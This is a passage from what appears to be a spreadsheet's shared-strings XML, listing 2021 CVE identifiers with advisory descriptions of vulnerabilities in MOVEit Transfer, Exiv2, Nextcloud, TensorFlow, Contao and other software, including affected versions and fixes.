    <t>In certain Progress MOVEit Transfer versions before 2021.0.3 (aka 13.0.3), SQL injection in the MOVEit Transfer web application could allow an authenticated remote attacker to gain access to the database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, or execute SQL statements that alter or delete database elements, via crafted strings sent to unique MOVEit Transfer transaction types. The fixed versions are 2019.0.7 (11.0.7), 2019.1.6 (11.1.6), 2019.2.3 (11.2.3), 2020.0.6 (12.0.6), 2020.1.5 (12.1.5), and 2021.0.3 (13.0.3).</t>
  </si>
  <si>
    <t>CVE-2021-37615</t>
  </si>
  <si>
    <t>Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. A null pointer dereference was found in Exiv2 versions v0.27.4 and earlier. The null pointer dereference is triggered when Exiv2 is used to print the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when printing the interpreted (translated) data, which is a less frequently used Exiv2 operation that requires an extra command line option (`-p t` or `-P t`). The bug is fixed in version v0.27.5.</t>
  </si>
  <si>
    <t>CVE-2021-37616</t>
  </si>
  <si>
    <t>CVE-2021-37617</t>
  </si>
  <si>
    <t>The Nextcloud Desktop Client is a tool to synchronize files from Nextcloud Server with a computer. The Nextcloud Desktop Client invokes its uninstaller script when being installed to make sure there are no remnants of previous installations. In versions 3.0.3 through 3.2.4, the Client searches the `Uninstall.exe` file in a folder that can be written by regular users. This could lead to a case where a malicious user creates a malicious `Uninstall.exe`, which would be executed with administrative privileges on the Nextcloud Desktop Client installation. This issue is fixed in Nextcloud Desktop Client version 3.3.0. As a workaround, do not allow untrusted users to create content in the `C:\` system folder and verify that there is no malicious `C:\Uninstall.exe` file on the system.</t>
  </si>
  <si>
    <t>CVE-2021-37618</t>
  </si>
  <si>
    <t>Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An out-of-bounds read was found in Exiv2 versions v0.27.4 and earlier. The out-of-bounds read is triggered when Exiv2 is used to print the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when printing the image ICC profile, which is a less frequently used Exiv2 operation that requires an extra command line option (`-p C`). The bug is fixed in version v0.27.5.</t>
  </si>
  <si>
    <t>CVE-2021-37619</t>
  </si>
  <si>
    <t>Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An out-of-bounds read was found in Exiv2 versions v0.27.4 and earlier. The out-of-bounds read is triggered when Exiv2 is used to write metadata into a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service by crashing Exiv2, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when writing the metadata, which is a less frequently used Exiv2 operation than reading the metadata. For example, to trigger the bug in the Exiv2 command-line application, you need to add an extra command-line argument such as insert. The bug is fixed in version v0.27.5.</t>
  </si>
  <si>
    <t>CVE-2021-3762</t>
  </si>
  <si>
    <t>A directory traversal vulnerability was found in the ClairCore engine of Clair. An attacker can exploit this by supplying a crafted container image which, when scanned by Clair, allows for arbitrary file write on the filesystem, potentially allowing for remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-37620</t>
  </si>
  <si>
    <t>Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An out-of-bounds read was found in Exiv2 versions v0.27.4 and earlier. The out-of-bounds read is triggered when Exiv2 is used to read the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. The bug is fixed in version v0.27.5.</t>
  </si>
  <si>
    <t>CVE-2021-37621</t>
  </si>
  <si>
    <t>Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An infinite loop was found in Exiv2 versions v0.27.4 and earlier. The infinite loop is triggered when Exiv2 is used to print the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when printing the image ICC profile, which is a less frequently used Exiv2 operation that requires an extra command line option (`-p C`). The bug is fixed in version v0.27.5.</t>
  </si>
  <si>
    <t>CVE-2021-37622</t>
  </si>
  <si>
    <t>Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An infinite loop was found in Exiv2 versions v0.27.4 and earlier. The infinite loop is triggered when Exiv2 is used to modify the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when deleting the IPTC data, which is a less frequently used Exiv2 operation that requires an extra command line option (`-d I rm`). The bug is fixed in version v0.27.5.</t>
  </si>
  <si>
    <t>CVE-2021-37623</t>
  </si>
  <si>
    <t>CVE-2021-37624</t>
  </si>
  <si>
    <t>FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.</t>
  </si>
  <si>
    <t>CVE-2021-37625</t>
  </si>
  <si>
    <t>Skytable is an open source NoSQL database. In versions prior to 0.6.4 an incorrect check of return value of the accept function in the run-loop for a TCP socket/TLS socket/TCP+TLS multi-socket causes an early exit from the run loop that should continue infinitely unless terminated by a local user, effectively causing the whole database server to shut down. This has severe impact and can be used to easily cause DoS attacks without the need to use much bandwidth. The attack vectors include using an incomplete TLS connection for example by not providing the certificate for the connection and using a specially crafted TCP packet that triggers the application layer backoff algorithm.</t>
  </si>
  <si>
    <t>CVE-2021-37626</t>
  </si>
  <si>
    <t>Contao is an open source CMS that allows you to create websites and scalable web applications. In affected versions it is possible to load PHP files by entering insert tags in the Contao back end. Installations are only affected if they have untrusted back end users who have the rights to modify fields that are shown in the front end. Update to Contao 4.4.56, 4.9.18 or 4.11.7 to resolve. If you cannot update then disable the login for untrusted back end users.</t>
  </si>
  <si>
    <t>CVE-2021-37627</t>
  </si>
  <si>
    <t>Contao is an open source CMS that allows creation of websites and scalable web applications. In affected versions it is possible to gain privileged rights in the Contao back end. Installations are only affected if they have untrusted back end users who have access to the form generator. All users are advised to update to Contao 4.4.56, 4.9.18 or 4.11.7. As a workaround users may disable the form generator or disable the login for untrusted back end users.</t>
  </si>
  <si>
    <t>CVE-2021-37628</t>
  </si>
  <si>
    <t>Nextcloud Richdocuments is an open source collaborative office suite. In affected versions the File Drop features ("Upload Only" public link shares in Nextcloud) can be bypassed using the Nextcloud Richdocuments app. An attacker was able to read arbitrary files in such a share. It is recommended that the Nextcloud Richdocuments is upgraded to 3.8.4 or 4.2.1. If upgrading is not possible then it is recommended to disable the Richdocuments application.</t>
  </si>
  <si>
    <t>CVE-2021-37629</t>
  </si>
  <si>
    <t>Nextcloud Richdocuments is an open source collaborative office suite. In affected versions there is a lack of rate limiting on the Richdocuments OCS endpoint. This may have allowed an attacker to enumerate potentially valid share tokens. It is recommended that the Nextcloud Richdocuments app is upgraded to either 3.8.4 or 4.2.1 to resolve. For users unable to upgrade it is recommended that the Richdocuments application be disabled.</t>
  </si>
  <si>
    <t>CVE-2021-3763</t>
  </si>
  <si>
    <t>A flaw was found in the Red Hat AMQ Broker management console in version 7.8 where an existing user is able to access some limited information even when the role the user is assigned to should not be allow access to the management console. The main impact is to confidentiality as this flaw means some role bindings are incorrectly checked, some privileged meta information such as queue names and configuration details are disclosed but the impact is limited as not all information is accessible and there is no affect to integrity.</t>
  </si>
  <si>
    <t>CVE-2021-37630</t>
  </si>
  <si>
    <t>Nextcloud Circles is an open source social network built for the nextcloud ecosystem. In affected versions the Nextcloud Circles application allowed any user to join any "Secret Circle" without approval by the Circle owner leaking private information. It is recommended that Nextcloud Circles is upgraded to 0.19.15, 0.20.11 or 0.21.4. There are no workarounds for this issue.</t>
  </si>
  <si>
    <t>CVE-2021-37631</t>
  </si>
  <si>
    <t>Deck is an open source kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. In affected versions the Deck application didn't properly check membership of users in a Circle. This allowed other users in the instance to gain access to boards that have been shared with a Circle, even if the user was not a member of the circle. It is recommended that Nextcloud Deck is upgraded to 1.5.1, 1.4.4 or 1.2.9. If you are unable to update it is advised to disable the Deck plugin.</t>
  </si>
  <si>
    <t>CVE-2021-37632</t>
  </si>
  <si>
    <t>SuperMartijn642's Config Lib is a library used by a number of mods for the game Minecraft. The versions of SuperMartijn642's Config Lib between 1.0.4 and 1.0.8 are affected by a vulnerability and can be exploited on both servers and clients. Using SuperMartijn642's Config Lib, servers will send a packet to clients with the server's config values. In order to read `enum` values from the packet data, `ObjectInputStream#readObject` is used. `ObjectInputStream#readObject` will instantiate a class based on the input data. Since, the packet data is not validated before `ObjectInputStream#readObject` is called, an attacker can instantiate any class by sending a malicious packet. If a suitable class is found, the vulnerability can lead to a number of exploits, including remote code execution. Although the vulnerable packet is typically only send from server to client, it can theoretically also be send from client to server. This means both clients and servers running SuperMartijn642's Config Lib between 1.0.4 and 1.0.8 are vulnerable. The vulnerability has been patched in SuperMartijn642's Config lib 1.0.9. Both, players and server owners, should update to 1.0.9 or higher.</t>
  </si>
  <si>
    <t>CVE-2021-37633</t>
  </si>
  <si>
    <t>Discourse is an open source discussion platform. In versions prior to 2.7.8 rendering of d-popover tooltips can be susceptible to XSS attacks. This vulnerability only affects sites which have modified or disabled Discourse's default Content Security Policy. This issue is patched in the latest `stable` 2.7.8 version of Discourse. As a workaround users may ensure that the Content Security Policy is enabled, and has not been modified in a way which would make it more vulnerable to XSS attacks.</t>
  </si>
  <si>
    <t>CVE-2021-37634</t>
  </si>
  <si>
    <t>Leafkit is a templating language with Swift-inspired syntax. Versions prior to 1.3.0 are susceptible to Cross-site Scripting (XSS) attacks. This affects anyone passing unsanitised data to Leaf's variable tags. Before this fix, Leaf would not escape any strings passed to tags as variables. If an attacker managed to find a variable that was rendered with their unsanitised data, they could inject scripts into a generated Leaf page, which could enable XSS attacks if other mitigations such as a Content Security Policy were not enabled. This has been patched in 1.3.0. As a workaround sanitize any untrusted input before passing it to Leaf and enable a CSP to block inline script and CSS data.</t>
  </si>
  <si>
    <t>CVE-2021-37635</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation of sparse reduction operations in TensorFlow can trigger accesses outside of bounds of heap allocated data. The [implementation](https://github.com/tensorflow/tensorflow/blob/a1bc56203f21a5a4995311825ffaba7a670d7747/tensorflow/core/kernels/sparse_reduce_op.cc#L217-L228) fails to validate that each reduction group does not overflow and that each corresponding index does not point to outside the bounds of the input tensor. We have patched the issue in GitHub commit 87158f43f05f2720a374f3e6d22a7aaa3a33f750. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37636</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation of `tf.raw_ops.SparseDenseCwiseDiv` is vulnerable to a division by 0 error. The [implementation](https://github.com/tensorflow/tensorflow/blob/a1bc56203f21a5a4995311825ffaba7a670d7747/tensorflow/core/kernels/sparse_dense_binary_op_shared.cc#L56) uses a common class for all binary operations but fails to treat the division by 0 case separately. We have patched the issue in GitHub commit d9204be9f49520cdaaeb2541d1dc5187b23f31d9. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37637</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. It is possible to trigger a null pointer dereference in TensorFlow by passing an invalid input to `tf.raw_ops.CompressElement`. The [implementation](https://github.com/tensorflow/tensorflow/blob/47a06f40411a69c99f381495f490536972152ac0/tensorflow/core/data/compression_utils.cc#L34) was accessing the size of a buffer obtained from the return of a separate function call before validating that said buffer is valid. We have patched the issue in GitHub commit 5dc7f6981fdaf74c8c5be41f393df705841fb7c5. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37638</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. Sending invalid argument for `row_partition_types` of `tf.raw_ops.RaggedTensorToTensor` API results in a null pointer dereference and undefined behavior. The [implementation](https://github.com/tensorflow/tensorflow/blob/47a06f40411a69c99f381495f490536972152ac0/tensorflow/core/kernels/ragged_tensor_to_tensor_op.cc#L328) accesses the first element of a user supplied list of values without validating that the provided list is not empty. We have patched the issue in GitHub commit 301ae88b331d37a2a16159b65b255f4f9eb39314. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37639</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. When restoring tensors via raw APIs, if the tensor name is not provided, TensorFlow can be tricked into dereferencing a null pointer. Alternatively, attackers can read memory outside the bounds of heap allocated data by providing some tensor names but not enough for a successful restoration. The [implementation](https://github.com/tensorflow/tensorflow/blob/47a06f40411a69c99f381495f490536972152ac0/tensorflow/core/kernels/save_restore_tensor.cc#L158-L159) retrieves the tensor list corresponding to the `tensor_name` user controlled input and immediately retrieves the tensor at the restoration index (controlled via `preferred_shard` argument). This occurs without validating that the provided list has enough values. If the list is empty this results in dereferencing a null pointer (undefined behavior). If, however, the list has some elements, if the restoration index is outside the bounds this results in heap OOB read. We have patched the issue in GitHub commit 9e82dce6e6bd1f36a57e08fa85af213e2b2f2622. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-3764</t>
  </si>
  <si>
    <t>A memory leak flaw was found in the Linux kernel's ccp_run_aes_gcm_cmd() function that allows an attacker to cause a denial of service. The vulnerability is similar to the older CVE-2019-18808. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-37640</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation of `tf.raw_ops.SparseReshape` can be made to trigger an integral division by 0 exception. The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/reshape_util.cc#L176-L181) calls the reshaping functor whenever there is at least an index in the input but does not check that shape of the input or the target shape have both a non-zero number of elements. The [reshape functor](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/reshape_util.cc#L40-L78) blindly divides by the dimensions of the target shape. Hence, if this is not checked, code will result in a division by 0. We have patched the issue in GitHub commit 4923de56ec94fff7770df259ab7f2288a74feb41. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1 as this is the other affected version.</t>
  </si>
  <si>
    <t>CVE-2021-37641</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions if the arguments to `tf.raw_ops.RaggedGather` don't determine a valid ragged tensor code can trigger a read from outside of bounds of heap allocated buffers. The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/ragged_gather_op.cc#L70) directly reads the first dimension of a tensor shape before checking that said tensor has rank of at least 1 (i.e., it is not a scalar). Furthermore, the implementation does not check that the list given by `params_nested_splits` is not an empty list of tensors. We have patched the issue in GitHub commit a2b743f6017d7b97af1fe49087ae15f0ac634373. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37642</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation of `tf.raw_ops.ResourceScatterDiv` is vulnerable to a division by 0 error. The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/resource_variable_ops.cc#L865) uses a common class for all binary operations but fails to treat the division by 0 case separately. We have patched the issue in GitHub commit 4aacb30888638da75023e6601149415b39763d76. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37643</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. If a user does not provide a valid padding value to `tf.raw_ops.MatrixDiagPartOp`, then the code triggers a null pointer dereference (if input is empty) or produces invalid behavior, ignoring all values after the first. The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/linalg/matrix_diag_op.cc#L89) reads the first value from a tensor buffer without first checking that the tensor has values to read from. We have patched the issue in GitHub commit 482da92095c4d48f8784b1f00dda4f81c28d2988. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37644</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions providing a negative element to `num_elements` list argument of `tf.raw_ops.TensorListReserve` causes the runtime to abort the process due to reallocating a `std::vector` to have a negative number of elements. The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/list_kernels.cc#L312) calls `std::vector.resize()` with the new size controlled by input given by the user, without checking that this input is valid. We have patched the issue in GitHub commit 8a6e874437670045e6c7dc6154c7412b4a2135e2. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37645</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation of `tf.raw_ops.QuantizeAndDequantizeV4Grad` is vulnerable to an integer overflow issue caused by converting a signed integer value to an unsigned one and then allocating memory based on this value. The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L126) uses the `axis` value as the size argument to `absl::InlinedVector` constructor. But, the constructor uses an unsigned type for the argument, so the implicit conversion transforms the negative value to a large integer. We have patched the issue in GitHub commit 96f364a1ca3009f98980021c4b32be5fdcca33a1. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, and TensorFlow 2.4.3, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37646</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation of `tf.raw_ops.StringNGrams` is vulnerable to an integer overflow issue caused by converting a signed integer value to an unsigned one and then allocating memory based on this value. The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/string_ngrams_op.cc#L184) calls `reserve` on a `tstring` with a value that sometimes can be negative if user supplies negative `ngram_widths`. The `reserve` method calls `TF_TString_Reserve` which has an `unsigned long` argument for the size of the buffer. Hence, the implicit conversion transforms the negative value to a large integer. We have patched the issue in GitHub commit c283e542a3f422420cfdb332414543b62fc4e4a5. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37647</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. When a user does not supply arguments that determine a valid sparse tensor, `tf.raw_ops.SparseTensorSliceDataset` implementation can be made to dereference a null pointer. The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/data/sparse_tensor_slice_dataset_op.cc#L240-L251) has some argument validation but fails to consider the case when either `indices` or `values` are provided for an empty sparse tensor when the other is not. If `indices` is empty, then [code that performs validation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/data/sparse_tensor_slice_dataset_op.cc#L260-L261) (i.e., checking that the indices are monotonically increasing) results in a null pointer dereference. If `indices` as provided by the user is empty, then `indices` in the C++ code above is backed by an empty `std::vector`, hence calling `indices-&gt;dim_size(0)` results in null pointer dereferencing (same as calling `std::vector::at()` on an empty vector). We have patched the issue in GitHub commit 02cc160e29d20631de3859c6653184e3f876b9d7. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37648</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the code for `tf.raw_ops.SaveV2` does not properly validate the inputs and an attacker can trigger a null pointer dereference. The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/save_restore_v2_ops.cc) uses `ValidateInputs` to check that the input arguments are valid. This validation would have caught the illegal state represented by the reproducer above. However, the validation uses `OP_REQUIRES` which translates to setting the `Status` object of the current `OpKernelContext` to an error status, followed by an empty `return` statement which just terminates the execution of the function it is present in. However, this does not mean that the kernel execution is finalized: instead, execution continues from the next line in `Compute` that follows the call to `ValidateInputs`. This is equivalent to lacking the validation. We have patched the issue in GitHub commit 9728c60e136912a12d99ca56e106b7cce7af5986. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37649</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. The code for `tf.raw_ops.UncompressElement` can be made to trigger a null pointer dereference. The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/data/experimental/compression_ops.cc#L50-L53) obtains a pointer to a `CompressedElement` from a `Variant` tensor and then proceeds to dereference it for decompressing. There is no check that the `Variant` tensor contained a `CompressedElement`, so the pointer is actually `nullptr`. We have patched the issue in GitHub commit 7bdf50bb4f5c54a4997c379092888546c97c3ebd. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-3765</t>
  </si>
  <si>
    <t>validator.js is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>CVE-2021-37650</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation for `tf.raw_ops.ExperimentalDatasetToTFRecord` and `tf.raw_ops.DatasetToTFRecord` can trigger heap buffer overflow and segmentation fault. The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/data/experimental/to_tf_record_op.cc#L93-L102) assumes that all records in the dataset are of string type. However, there is no check for that, and the example given above uses numeric types. We have patched the issue in GitHub commit e0b6e58c328059829c3eb968136f17aa72b6c876. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37651</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation for `tf.raw_ops.FractionalAvgPoolGrad` can be tricked into accessing data outside of bounds of heap allocated buffers. The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/fractional_avg_pool_op.cc#L205) does not validate that the input tensor is non-empty. Thus, code constructs an empty `EigenDoubleMatrixMap` and then accesses this buffer with indices that are outside of the empty area. We have patched the issue in GitHub commit 0f931751fb20f565c4e94aa6df58d54a003cdb30. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37652</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation for `tf.raw_ops.BoostedTreesCreateEnsemble` can result in a use after free error if an attacker supplies specially crafted arguments. The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/boosted_trees/resource_ops.cc#L55) uses a reference counted resource and decrements the refcount if the initialization fails, as it should. However, when the code was written, the resource was represented as a naked pointer but later refactoring has changed it to be a smart pointer. Thus, when the pointer leaves the scope, a subsequent `free`-ing of the resource occurs, but this fails to take into account that the refcount has already reached 0, thus the resource has been already freed. During this double-free process, members of the resource object are accessed for cleanup but they are invalid as the entire resource has been freed. We have patched the issue in GitHub commit 5ecec9c6fbdbc6be03295685190a45e7eee726ab. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37653</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can trigger a crash via a floating point exception in `tf.raw_ops.ResourceGather`. The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L725-L731) computes the value of a value, `batch_size`, and then divides by it without checking that this value is not 0. We have patched the issue in GitHub commit ac117ee8a8ea57b73d34665cdf00ef3303bc0b11. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37654</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can trigger a crash via a `CHECK`-fail in debug builds of TensorFlow using `tf.raw_ops.ResourceGather` or a read from outside the bounds of heap allocated data in the same API in a release build. The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L660-L668) does not check that the `batch_dims` value that the user supplies is less than the rank of the input tensor. Since the implementation uses several for loops over the dimensions of `tensor`, this results in reading data from outside the bounds of heap allocated buffer backing the tensor. We have patched the issue in GitHub commit bc9c546ce7015c57c2f15c168b3d9201de679a1d. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37655</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can trigger a read from outside of bounds of heap allocated data by sending invalid arguments to `tf.raw_ops.ResourceScatterUpdate`. The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L919-L923) has an incomplete validation of the relationship between the shapes of `indices` and `updates`: instead of checking that the shape of `indices` is a prefix of the shape of `updates` (so that broadcasting can happen), code only checks that the number of elements in these two tensors are in a divisibility relationship. We have patched the issue in GitHub commit 01cff3f986259d661103412a20745928c727326f. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37656</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.RaggedTensorToSparse`. The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/ragged_tensor_to_sparse_kernel.cc#L30) has an incomplete validation of the splits values: it does not check that they are in increasing order. We have patched the issue in GitHub commit 1071f554dbd09f7e101324d366eec5f4fe5a3ece. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
